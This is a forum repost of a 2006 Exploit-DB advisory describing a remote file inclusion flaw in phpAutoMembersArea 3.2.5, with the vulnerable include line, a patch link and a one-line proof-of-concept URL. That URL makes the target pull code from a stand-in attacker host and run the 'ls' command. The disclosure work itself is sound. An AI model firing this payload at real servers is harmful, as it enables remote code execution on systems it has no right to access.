Exploit phpAutoMembersArea 3.2.5 - 'installed_config_file' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2132
Проверка EDB
  1. Пройдено
Автор
PHILIPP NIEDZIELA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-4050
Дата публикации
2006-08-07
Код:
+--------------------------------------------------------------------
+
+ phpAutoMembersArea 3.2.5 ($installed_config_file) Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: phpAutoMembersArea 3.2.5
+ Venedor ...........: http://www.dwalker.co.uk
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/sicherheit_83.htm
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code auto_check_renewals.php (line 20):
+
+ .....
+ include($installed_config_file);:
+
+ .....
+
+--------------------------------------------------------------------
+
+ $installed_config_file is not properly sanitized before being used
+
+--------------------------------------------------------------------
+
+ Solution:
+ Download the upgrade now:
+ http://www.dwalker.co.uk/phpautomembersarea/
+ See: http://dwalker.co.uk/forum/viewtopic.php?t=517
+
+--------------------------------------------------------------------
+
+ PoC:
+ http://[target]/auto_check_renewals.php?installed_config_file=http://evilsite.com?cmd=ls
+
+--------------------------------------------------------------------
+
+ Comment:
+ Thanks for the friendly and quick contact with the developer
+ David Walker.
+ Reported the vuln today at 10:04am -> patch available 4:47pm
+ -> ideal!!!!
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-08-07]
 
Источник
www.exploit-db.com

Похожие темы